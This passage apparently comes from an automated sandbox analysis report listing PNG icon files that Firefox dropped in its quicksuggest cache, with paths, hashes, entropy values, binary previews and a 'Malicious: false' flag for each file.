Preview:	.PNG........IHDR.............L\....4.IDATx..}..de.v...LW..=.>...<..]ar......w..........&0.t.\....E...".......+.#..$H.aRwU...}.......F..o..QSu...{...s.mq..L.Hf&.f.fx....3[...9...zL...q..8+`......N;.?1[.m..-5n..JY..f5..n.j_d..kp..V.M_s=w].<-u.~...O=w.Y...~bV..9......K.U.~52+.i%_...0..6k....l.<-.>.....f.............T[..D...=....s.5.qk..?.^.q...~.L.{.f\.2..K.6...'.]....xK(...2.FEa=...V7.Zfq.....=....Q....6-sg....hU'..*..e......g........n:....j.......8..._3W.V...[...r...5.T.Hw4GG..\+(.#............m.+.FG../L.......3$O,[...I...I....,4j...]1 q..-1..QWt.F ..h..p}KS<.+...,......e.d.Q..Y..e...I..K..`..pb..... .u >.[.....R$.$<.;....#^`2.p..'s.P.c~..d..e..7Fr.T .......-!.]^".H.E... O(...-...smNB8%V--..Nc..Q....`.@.o.\..n.2!.b%....Y...,.4kxr..R(..J3.-..e..@..`. .........@..hn.(.9.,.......b..M.G.H...../....yAd...Fo.........fg\..t[0.#.~......"9cD.$.B..fZ.................(.S......)...o(.7...7oL...L\|.....s..S;.^.`.W.!O...h.....x.Y..M..-9..I8.) ...%.J,.

C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\settings\main\quicksuggest\icon-161351842026220.tmp

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	PNG image data, 128 x 128, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	13554
Entropy (8bit):	7.967688317652606
Encrypted:	false
SSDEEP:	384:FqwBoZeYL8zkQCs0y/ON6ep0vwCRk4Yf93+I0SihTrXjA:M32zkJ62N6euwCRIkDSihTrk
MD5:	55437681F19C00A1E08EDA205C1004D5
SHA1:	959213FA8938973B1E5A02D6CD12B0A82D2D7E48
SHA-256:	78EBA5F35AE77298800F3A5860FED08D0F9656EB89B80D4C651F2B3E6A51D0BC
SHA-512:	C0E168781A311253268ABCFB60B0305B07126DDEA75ECD7E7B48617D7A9CAF5F12A5D0EFCFA34F2E43CB914FE45343961DE15E45E71AB6EFDF3D6B3354AB223A
Malicious:	false
Preview:	.PNG........IHDR.............L\....4.IDATx..}..de.v...LW..=.>...<..]ar......w..........&0.t.\....E...".......+.#..$H.aRwU...}.......F..o..QSu...{...s.mq..L.Hf&.f.fx....3[...9...zL...q..8+`......N;.?1[.m..-5n..JY..f5..n.j_d..kp..V.M_s=w].<-u.~...O=w.Y...~bV..9......K.U.~52+.i%_...0..6k....l.<-.>.....f.............T[..D...=....s.5.qk..?.^.q...~.L.{.f\.2..K.6...'.]....xK(...2.FEa=...V7.Zfq.....=....Q....6-sg....hU'..*..e......g........n:....j.......8..._3W.V...[...r...5.T.Hw4GG..\+(.#............m.+.FG../L.......3$O,[...I...I....,4j...]1 q..-1..QWt.F ..h..p}KS<.+...,......e.d.Q..Y..e...I..K..`..pb..... .u >.[.....R$.$<.;....#^`2.p..'s.P.c~..d..e..7Fr.T .......-!.]^".H.E... O(...-...smNB8%V--..Nc..Q....`.@.o.\..n.2!.b%....Y...,.4kxr..R(..J3.-..e..@..`. .........@..hn.(.9.,.......b..M.G.H...../....yAd...Fo.........fg\..t[0.#.~......"9cD.$.B..fZ.................(.S......)...o(.7...7oL...L\|.....s..S;.^.`.W.!O...h.....x.Y..M..-9..I8.) ...%.J,.

C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\settings\main\quicksuggest\icon-161351842073252 (copy)

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	PNG image data, 128 x 128, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	16120
Entropy (8bit):	7.978780362755326
Encrypted:	false
SSDEEP:	384:zj2gyubem+DWUbnyuQ7VrIMBQCY2LO2ViGGfkFyqZu:zjymWWAtQmMBrO2a8hu
MD5:	78513A8506D9DE8B80FE2629B1A53B7D
SHA1:	0576D40E8D2D3E7A3876EC74C5984A938A7D08F5
SHA-256:	F3A2D8A144E71259FF8103BC2EAAC44107B1623E97A7A725C2FD7A78F1AAF536
SHA-512:	E915BB27649D12904BD5BBBC262106F0179AB2E8CAFFC3EAB3BF805B0B03E01068A21A003AEB48B4D5A4B51DE77C3830A03B3BEC3E39C97DA221BD105CEB4540
Malicious:	false
Preview:	.PNG........IHDR.............L\....>.IDATx..}.x[.u&...w..6[.....,M.&..I.4.4M.....f.i.v2u2..N.E..}.....p.wR.}....d.%[..J"...o.9.=.v...}.kwh..A,..s.9.9.?.4....7...)...........5...%...%.-.l.-.l.`kl.`K.[cK.[....96.. W......X.....V....5.u..5........P...,a.....>....a.8G6_..k....X.ll...%.#W....^......s-Qy."..n.(2P...r.>......."...a.....,..t{a.....0.(..\...,.y._5,(....[...[..>?.Cc....ae..6..&.....W....\|r...\|..UT..M.....I.....RQ6~ ..s..2/.Z.r......,...`...+.=........Ql!.I..2.../~.yA/.0.f...4.[....n.U....{....X...b.uD..'5...~.5J..U.[.L.....~....!.=.CV)$..o..>.`Ig>..h....rp.6g.7...D......m..}.h.}.$L..(.X.0#.z....Ee.2......=............lu.(Z.Q.>..E..T.X.M......q...y.....,.E-?..`..*.Wesk..0;8...6.@(T>.g.5......?..h..Yl..M...].b.A..-yv?e.A.........8p..~.J?<.g`........~5.Wmu.,..^..^.K;.5..2..?`ZU.3a![.Z..3.O5..1GU..J...9..~.\|..jKDc^..A.j.....-.....].r.6x._k......x.......J.a..C.'sy.5-....9.Geu...s,>v{0. !=./..&w..Y.6[.2U.\|..i..i..a....{.w5..4.V5.

C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\settings\main\quicksuggest\icon-161351842073252.tmp

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	PNG image data, 128 x 128, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	16120
Entropy (8bit):	7.978780362755326
Encrypted:	false
SSDEEP:	384:zj2gyubem+DWUbnyuQ7VrIMBQCY2LO2ViGGfkFyqZu:zjymWWAtQmMBrO2a8hu
MD5:	78513A8506D9DE8B80FE2629B1A53B7D
SHA1:	0576D40E8D2D3E7A3876EC74C5984A938A7D08F5
SHA-256:	F3A2D8A144E71259FF8103BC2EAAC44107B1623E97A7A725C2FD7A78F1AAF536
SHA-512:	E915BB27649D12904BD5BBBC262106F0179AB2E8CAFFC3EAB3BF805B0B03E01068A21A003AEB48B4D5A4B51DE77C3830A03B3BEC3E39C97DA221BD105CEB4540
Malicious:	false
Preview:	.PNG........IHDR.............L\....>.IDATx..}.x[.u&...w..6[.....,M.&..I.4.4M.....f.i.v2u2..N.E..}.....p.wR.}....d.%[..J"...o.9.=.v...}.kwh..A,..s.9.9.?.4....7...)...........5...%...%.-.l.-.l.`kl.`K.[cK.[....96.. W......X.....V....5.u..5........P...,a.....>....a.8G6_..k....X.ll...%.#W....^......s-Qy."..n.(2P...r.>......."...a.....,..t{a.....0.(..\...,.y._5,(....[...[..>?.Cc....ae..6..&.....W....\|r...\|..UT..M.....I.....RQ6~ ..s..2/.Z.r......,...`...+.=........Ql!.I..2.../~.yA/.0.f...4.[....n.U....{....X...b.uD..'5...~.5J..U.[.L.....~....!.=.CV)$..o..>.`Ig>..h....rp.6g.7...D......m..}.h.}.$L..(.X.0#.z....Ee.2......=............lu.(Z.Q.>..E..T.X.M......q...y.....,.E-?..`..*.Wesk..0;8...6.@(T>.g.5......?..h..Yl..M...].b.A..-yv?e.A.........8p..~.J?<.g`........~5.Wmu.,..^..^.K;.5..2..?`ZU.3a![.Z..3.O5..1GU..J...9..~.\|..jKDc^..A.j.....-.....].r.6x._k......x.......J.a..C.'sy.5-....9.Geu...s,>v{0. !=./..&w..Y.6[.2U.\|..i..i..a....{.w5..4.V5.

C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\settings\main\quicksuggest\icon-161351842073588 (copy)

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	PNG image data, 128 x 128, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	8359
Entropy (8bit):	7.948612005367863
Encrypted:	false
SSDEEP:	192:V3g+4Lngpq7SuVyyv3qbNxJPvzvsC3qtK/3mjPj4xpo:VQ+4LnI7u0OsNx1vzvsC3Ik3A74xpo
MD5:	B5F496D93E8BD46E7465BAFE8122FAE4
SHA1:	BE0FD62E91C2A533041E88FB7FC223FFB5C3BBB7
SHA-256:	1B0D649AA40AFF788420CC232E8BC5B0BB5DFFA9356E94C252E8FABE8F1997C3
SHA-512:	5073BB666CE222B9B3A5872A56AA032954B1C98C7378144A11BE17A7E630670B7A57B53051CF09A77EA3951734CEA8261F465BC0DA3EC3FF7E13F3AD61ADC3C1
Malicious:	false
Preview:	.PNG........IHDR.............L\.... nIDATx..{wT.W......Q t......`.....c.w.c{.^...$B.. K(g.I... ......... @H".$D.N......A....f..w.NWu.......n?...?..."..........0.....!. . .....a.....C.@.@................0.....!. . .....a.....C.@.@................0.....!. . .....a....#C.....>F..`.W.....'.'.7..Q..`.....xs..m,......Mq...L.C..d3.#.S.`Gm.Sq..t.\|..2,?=7r.K.....'.n....9..)..9..p,.......9....q..7..&.c_.?.....e.w..[.>[.'....,.Y\...dN.Y...q.)....T....?.,Q...2...9h.c.n....q.(+.5.h.a....%.......k.....G.UV..=.......!.s.zD......z=3.a.....?3cA.F... I..<...D..O.V.0.H.2.F..OC.4......3,.yA.......E..n..>.....`..Fs[.;......X<5....4Y....D ,.&H..H.......0c......._N..........C.R.4.d6.\...Y..6.#o...._...w..G....f....;.........../+}#...]w..j..=&z8,0+g......h`.g+mA.h...Q.}...<.....).....5.f'.&.......r6.cT..\8.&1...Xf.xHX.....t.........3K...Z.K.T.........e2..P.zr>b..$.. .l.3:.C=.............+.eZi...duX....9....^g.fAX.b,F$..]v..!.......ae.N...tX.p......}.i...q....f.N.

C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\settings\main\quicksuggest\icon-161351842073588.tmp

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	PNG image data, 128 x 128, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	8359
Entropy (8bit):	7.948612005367863
Encrypted:	false
SSDEEP:	192:V3g+4Lngpq7SuVyyv3qbNxJPvzvsC3qtK/3mjPj4xpo:VQ+4LnI7u0OsNx1vzvsC3Ik3A74xpo
MD5:	B5F496D93E8BD46E7465BAFE8122FAE4
SHA1:	BE0FD62E91C2A533041E88FB7FC223FFB5C3BBB7
SHA-256:	1B0D649AA40AFF788420CC232E8BC5B0BB5DFFA9356E94C252E8FABE8F1997C3
SHA-512:	5073BB666CE222B9B3A5872A56AA032954B1C98C7378144A11BE17A7E630670B7A57B53051CF09A77EA3951734CEA8261F465BC0DA3EC3FF7E13F3AD61ADC3C1
Malicious:	false
Preview:	.PNG........IHDR.............L\.... nIDATx..{wT.W......Q t......`.....c.w.c{.^...$B.. K(g.I... ......... @H".$D.N......A....f..w.NWu.......n?...?..."..........0.....!. . .....a.....C.@.@................0.....!. . .....a.....C.@.@................0.....!. . .....a....#C.....>F..`.W.....'.'.7..Q..`.....xs..m,......Mq...L.C..d3.#.S.`Gm.Sq..t.\|..2,?=7r.K.....'.n....9..)..9..p,.......9....q..7..&.c_.?.....e.w..[.>[.'....,.Y\...dN.Y...q.)....T....?.,Q...2...9h.c.n....q.(+.5.h.a....%.......k.....G.UV..=.......!.s.zD......z=3.a.....?3cA.F... I..<...D..O.V.0.H.2.F..OC.4......3,.yA.......E..n..>.....`..Fs[.;......X<5....4Y....D ,.&H..H.......0c......._N..........C.R.4.d6.\...Y..6.#o...._...w..G....f....;.........../+}#...]w..j..=&z8,0+g......h`.g+mA.h...Q.}...<.....).....5.f'.&.......r6.cT..\8.&1...Xf.xHX.....t.........3K...Z.K.T.........e2..P.zr>b..$.. .l.3:.C=.............+.eZi...duX....9....^g.fAX.b,F$..]v..!.......ae.N...tX.p......}.i...q....f.N.

C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\settings\main\quicksuggest\icon-161351842074161 (copy)

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	8987
Entropy (8bit):	7.946881842172931
Encrypted:	false
SSDEEP:	192:IxgSNCW4ajjS8j9yxcyHmO2MCu/WJ35SQvu9b:2TCW9xy7GWCu+15jk
MD5:	03FEF41989A39D5DA991CBF957543716
SHA1:	8C6AD9EFB32F353D00D73499B09B5551EE381C15
SHA-256:	9D463E9F7538722DA0303A4924CE9517B1FB4EE77077CCB60420750755AC59C2
SHA-512:	6D0B15CA41D4764AC0BAAA89B13CA75A20638F4A56C8DD458EC211A85CF7620C26D78AD0511C665686DE8C5AF407446021E59216B6EFC3C72FF3F3A0C49338FB
Malicious:	false
Preview:	.PNG........IHDR..............>a.....sRGB.........gAMA......a.....pHYs..........o.d..".IDATx^.\|..^eu..:..$..@.B..P..hU.....-.R....zm.2iU....EE.E..S..^......$....$99.?......'.@b..g.u.........z.Z...}b..d.Z.G^3I.d.H.d.H.d.H.d.H.d.H.d.H.d.H.d.H.d.H.d.H.d.H.d.H.d.H.d.H.d.H.d.H.d.H.d.H.d.H.d.H.d.H.d.H.d.H.d.H.d.H.d.H.d.H.d.H.d.H.d.H.d.H.d.H.d.H.d.H.d.H.d.H.d.H.d.H..u.H....c..~..+......U..h. ,..k.5.....U^...2...9...P..o......}...th.......p.f8...{p..uD....b9....~..g........?[..-..X...7.....L.1.TE....e.jy.=...@0x...,..)9..........>.S.2..\|-..#Xv.!.8.#s}&./G..,..c.....y...".~I.s.....?..T.....j.A&...\).. .rt.`$..:....)9........m..N.......gMNb.jLT..c.....=.l.,.j.a....Q...G,.H.X.;...P.]WG"g#d...0..B.9.e_....g...6.)..g.>"?..N..]6....Y.J,.....F.f.5.....E.h(:.+..c.m..<@rYcU.c[!.s6A.p..F...........+.x...h.7W9W...J^..y.n...H.j.I.'.RO.+.c\|.....G..R..Zlc<...c.E[.l."YN..y.e....h.DM...c.XD.(..@.JY...WMB..\...P}y...G....;....=0.Tk...Z,...p.t 7g6..' ....'P...C..2.%.....

C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\settings\main\quicksuggest\icon-161351842074161.tmp

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	8987
Entropy (8bit):	7.946881842172931
Encrypted:	false
SSDEEP:	192:IxgSNCW4ajjS8j9yxcyHmO2MCu/WJ35SQvu9b:2TCW9xy7GWCu+15jk
MD5:	03FEF41989A39D5DA991CBF957543716
SHA1:	8C6AD9EFB32F353D00D73499B09B5551EE381C15
SHA-256:	9D463E9F7538722DA0303A4924CE9517B1FB4EE77077CCB60420750755AC59C2
SHA-512:	6D0B15CA41D4764AC0BAAA89B13CA75A20638F4A56C8DD458EC211A85CF7620C26D78AD0511C665686DE8C5AF407446021E59216B6EFC3C72FF3F3A0C49338FB
Malicious:	false
Preview:	.PNG........IHDR..............>a.....sRGB.........gAMA......a.....pHYs..........o.d..".IDATx^.\|..^eu..:..$..@.B..P..hU.....-.R....zm.2iU....EE.E..S..^......$....$99.?......'.@b..g.u.........z.Z...}b..d.Z.G^3I.d.H.d.H.d.H.d.H.d.H.d.H.d.H.d.H.d.H.d.H.d.H.d.H.d.H.d.H.d.H.d.H.d.H.d.H.d.H.d.H.d.H.d.H.d.H.d.H.d.H.d.H.d.H.d.H.d.H.d.H.d.H.d.H.d.H.d.H.d.H.d.H.d.H.d.H..u.H....c..~..+......U..h. ,..k.5.....U^...2...9...P..o......}...th.......p.f8...{p..uD....b9....~..g........?[..-..X...7.....L.1.TE....e.jy.=...@0x...,..)9..........>.S.2..\|-..#Xv.!.8.#s}&./G..,..c.....y...".~I.s.....?..T.....j.A&...\).. .rt.`$..:....)9........m..N.......gMNb.jLT..c.....=.l.,.j.a....Q...G,.H.X.;...P.]WG"g#d...0..B.9.e_....g...6.)..g.>"?..N..]6....Y.J,.....F.f.5.....E.h(:.+..c.m..<@rYcU.c[!.s6A.p..F...........+.x...h.7W9W...J^..y.n...H.j.I.'.RO.+.c\|.....G..R..Zlc<...c.E[.l."YN..y.e....h.DM...c.XD.(..@.JY...WMB..\...P}y...G....;....=0.Tk...Z,...p.t 7g6..' ....'P...C..2.%.....

C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\settings\main\quicksuggest\icon-161351842074183 (copy)

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	PNG image data, 128 x 128, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	5376
Entropy (8bit):	7.6173470696247
Encrypted:	false
SSDEEP:	96:nSHknmWIkV/UleHYWUHuH4FTPtazVDE7Ao9KTZiJh2aEwArEjax4x6:nSHknke4WUOGLtd7AoEV7dnxq6
MD5:	60891B1FC0D5E80B93F01AD95DF34786
SHA1:	DDD4F47570C65CE217472CF8E9F47E6100F6A5D8
SHA-256:	D87A033C09158FB32CD6065CC365D86C4926E19739E40C6C6CCC588212A47661
SHA-512:	4060D5794237365F1D76B84A40F03179FD080410210F003E1BF7CF24ABB2CF740E921B57EE645569E4CB7BCC003D0CC4826931EE8BB43C2C70BFB10DEF1C603F
Malicious:	false
Preview:	.PNG........IHDR.............L\......pHYs.................iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c006 79.164753, 2021/02/15-11:52:13 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmp:CreatorTool="Adobe Photoshop 22.3 (Macintosh)" xmp:CreateDate="2022-05-23T12:36:09-04:00" xmp:ModifyDate="2022-06-08T17:51:18-04:00" xmp:MetadataDate="2022-06-08T17:51:18-04:00" dc:format="image/png" photoshop:ColorMode="3" photoshop:ICCProfile="sRGB IEC61966-2.1" xmpMM:InstanceID="xmp.iid:99472c83-125e-4556-bab8-ffed54a5a80b" xmpMM:DocumentID="adobe:docid:photoshop:5f0f9ddf-c75b-c34d-8520-167df2abcb18

C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\settings\main\quicksuggest\icon-161351842074183.tmp

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	PNG image data, 128 x 128, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	5376
Entropy (8bit):	7.6173470696247
Encrypted:	false
SSDEEP:	96:nSHknmWIkV/UleHYWUHuH4FTPtazVDE7Ao9KTZiJh2aEwArEjax4x6:nSHknke4WUOGLtd7AoEV7dnxq6
MD5:	60891B1FC0D5E80B93F01AD95DF34786
SHA1:	DDD4F47570C65CE217472CF8E9F47E6100F6A5D8
SHA-256:	D87A033C09158FB32CD6065CC365D86C4926E19739E40C6C6CCC588212A47661
SHA-512:	4060D5794237365F1D76B84A40F03179FD080410210F003E1BF7CF24ABB2CF740E921B57EE645569E4CB7BCC003D0CC4826931EE8BB43C2C70BFB10DEF1C603F
Malicious:	false
Preview:	.PNG........IHDR.............L\......pHYs.................iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c006 79.164753, 2021/02/15-11:52:13 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmp:CreatorTool="Adobe Photoshop 22.3 (Macintosh)" xmp:CreateDate="2022-05-23T12:36:09-04:00" xmp:ModifyDate="2022-06-08T17:51:18-04:00" xmp:MetadataDate="2022-06-08T17:51:18-04:00" dc:format="image/png" photoshop:ColorMode="3" photoshop:ICCProfile="sRGB IEC61966-2.1" xmpMM:InstanceID="xmp.iid:99472c83-125e-4556-bab8-ffed54a5a80b" xmpMM:DocumentID="adobe:docid:photoshop:5f0f9ddf-c75b-c34d-8520-167df2abcb18

C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\settings\main\quicksuggest\icon-161351842074245 (copy)

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	15000
Entropy (8bit):	7.931313517173274
Encrypted:	false
SSDEEP:	384:5fnngsOQbom/0qeph3FLVoADgePWPBI0T33RjMgTLKNRvz6Bg:RHbR3e7FmADgeP2bT3v6NRvua
MD5:	1C22B7FCD4DA1FD319ED56535C94C689
SHA1:	DED8854A6B26DBC4571976EE48CE51D78B22EBF7
SHA-256:	0346042039F4BF138D764354638F8C6C7C5A1B060D586F0EE644BB97E4749F99
SHA-512:	BBF747E0CF6283B6531112B53F9204A5CD815341A2C02112CFB8D6CBE329D615BA4E36CA851AF9A3041956D2EA09DA8AA1741350EDED1D6C777AC378834F4D0D
Malicious:	false
Preview:	.PNG........IHDR..............>a.....pHYs.................iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c006 79.164753, 2021/02/15-11:52:13 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmp:CreatorTool="Adobe Photoshop 22.3 (Macintosh)" xmp:CreateDate="2022-06-01T10:40:33-04:00" xmp:ModifyDate="2022-06-01T10:46:52-04:00" xmp:MetadataDate="2022-06-01T10:46:52-04:00" dc:format="image/png" photoshop:ColorMode="3" photoshop:ICCProfile="sRGB IEC61966-2.1" xmpMM:InstanceID="xmp.iid:e43be855-64ae-4340-8598-6b066a136a95" xmpMM:DocumentID="adobe:docid:photoshop:ed68f7aa-f4f1-fd4f-ad2e-d43cd1fcbde6

C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\settings\main\quicksuggest\icon-161351842074245.tmp

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	15000
Entropy (8bit):	7.931313517173274
Encrypted:	false
SSDEEP:	384:5fnngsOQbom/0qeph3FLVoADgePWPBI0T33RjMgTLKNRvz6Bg:RHbR3e7FmADgeP2bT3v6NRvua
MD5:	1C22B7FCD4DA1FD319ED56535C94C689
SHA1:	DED8854A6B26DBC4571976EE48CE51D78B22EBF7
SHA-256:	0346042039F4BF138D764354638F8C6C7C5A1B060D586F0EE644BB97E4749F99
SHA-512:	BBF747E0CF6283B6531112B53F9204A5CD815341A2C02112CFB8D6CBE329D615BA4E36CA851AF9A3041956D2EA09DA8AA1741350EDED1D6C777AC378834F4D0D
Malicious:	false
Preview:	.PNG........IHDR..............>a.....pHYs.................iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c006 79.164753, 2021/02/15-11:52:13 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmp:CreatorTool="Adobe Photoshop 22.3 (Macintosh)" xmp:CreateDate="2022-06-01T10:40:33-04:00" xmp:ModifyDate="2022-06-01T10:46:52-04:00" xmp:MetadataDate="2022-06-01T10:46:52-04:00" dc:format="image/png" photoshop:ColorMode="3" photoshop:ICCProfile="sRGB IEC61966-2.1" xmpMM:InstanceID="xmp.iid:e43be855-64ae-4340-8598-6b066a136a95" xmpMM:DocumentID="adobe:docid:photoshop:ed68f7aa-f4f1-fd4f-ad2e-d43cd1fcbde6

C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\settings\main\quicksuggest\icon-161351842074251 (copy)

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	PNG image data, 128 x 128, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	15693
Entropy (8bit):	7.960807875047715
Encrypted:	false
SSDEEP:	384:39tuAMTijnNdwphGvig6U/thQ2R1CQWRhdD6BmL:3TuAMTgdwphGv36UiHDemL
MD5:	488DF5C721BF9D619E7D1A427D4F80E3
SHA1:	56D5B92BC99FBD46F831E52982C2FF0A1FCEE301
SHA-256:	82F6DB7F64C6D1EE7376DC0E9D1000075B23259E13838DC05FD49AD3DA8380C0
SHA-512:	7471BC65A42C7DA62E03F790D157CC406CABFB0BD761E52570F5A7476E6A6772E5C6E094857C41E0ED6D4A61F48FCAC4A5EE040C6C505023F01244325EBF79B6
Malicious:	false
Preview:	.PNG........IHDR.............L\....=.IDATx..].XT[."E..b!...twwI.4...........&........3gf.@..x....s.y.......Z{.1.....8..#.y..7.......?.~..,....3...g..0..6.....]...G.T....5HX..T..q88q#%.....{.....88iiiihh....2.A......Z..x<..pu,.7....3gp............../^.\|..;.o.y.....>}r........(...12....!.K ..k.KG.-....%Q.0(...O<(B...LeU.......d..4......\|........]..m]=.-m.MMM..--M..mm-...]].p..6.......:t...YHH.......d.%N.%..A...I.z`......KT\|...~...n....h..l.....m..ih..o...-..F_K+..k.k.jK.J..J..KK.........................;w.....2...G<......}.y<T.........)...............;\...........H...437.sF.....9....E%...5.5......u......E....9y..Yp.`445.I.>{F[W....rK(...GE.opA...:......j...n\o...........^...gkgOckGaiE...[...=xd..]kB#V...zz..\......s..J??.o_O__..O``x.M;v.;u....iY..ee......yE.iY...`+U.S]......!....)...%...aS.</.....qbb"...."..Z......R]............).p62..stqt...{.......^....>....O....[..F.....6(<.70.......u.*x..).9.M. ......Y.Y9..uyyy{.....Go._.P.G.'M.d

C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\settings\main\quicksuggest\icon-161351842074251.tmp

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	PNG image data, 128 x 128, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	15693
Entropy (8bit):	7.960807875047715
Encrypted:	false
SSDEEP:	384:39tuAMTijnNdwphGvig6U/thQ2R1CQWRhdD6BmL:3TuAMTgdwphGv36UiHDemL
MD5:	488DF5C721BF9D619E7D1A427D4F80E3
SHA1:	56D5B92BC99FBD46F831E52982C2FF0A1FCEE301
SHA-256:	82F6DB7F64C6D1EE7376DC0E9D1000075B23259E13838DC05FD49AD3DA8380C0
SHA-512:	7471BC65A42C7DA62E03F790D157CC406CABFB0BD761E52570F5A7476E6A6772E5C6E094857C41E0ED6D4A61F48FCAC4A5EE040C6C505023F01244325EBF79B6
Malicious:	false
Preview:	.PNG........IHDR.............L\....=.IDATx..].XT[."E..b!...twwI.4...........&........3gf.@..x....s.y.......Z{.1.....8..#.y..7.......?.~..,....3...g..0..6.....]...G.T....5HX..T..q88q#%.....{.....88iiiihh....2.A......Z..x<..pu,.7....3gp............../^.\|..;.o.y.....>}r........(...12....!.K ..k.KG.-....%Q.0(...O<(B...LeU.......d..4......\|........]..m]=.-m.MMM..--M..mm-...]].p..6.......:t...YHH.......d.%N.%..A...I.z`......KT\|...~...n....h..l.....m..ih..o...-..F_K+..k.k.jK.J..J..KK.........................;w.....2...G<......}.y<T.........)...............;\...........H...437.sF.....9....E%...5.5......u......E....9y..Yp.`445.I.>{F[W....rK(...GE.opA...:......j...n\o...........^...gkgOckGaiE...[...=xd..]kB#V...zz..\......s..J??.o_O__..O``x.M;v.;u....iY..ee......yE.iY...`+U.S]......!....)...%...aS.</.....qbb"...."..Z......R]............).p62..stqt...{.......^....>....O....[..F.....6(<.70.......u.*x..).9.M. ......Y.Y9..uyyy{.....Go._.P.G.'M.d

C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\settings\main\quicksuggest\icon-161351842074301 (copy)

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	PNG image data, 200 x 200, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	4932
Entropy (8bit):	7.950481216633536
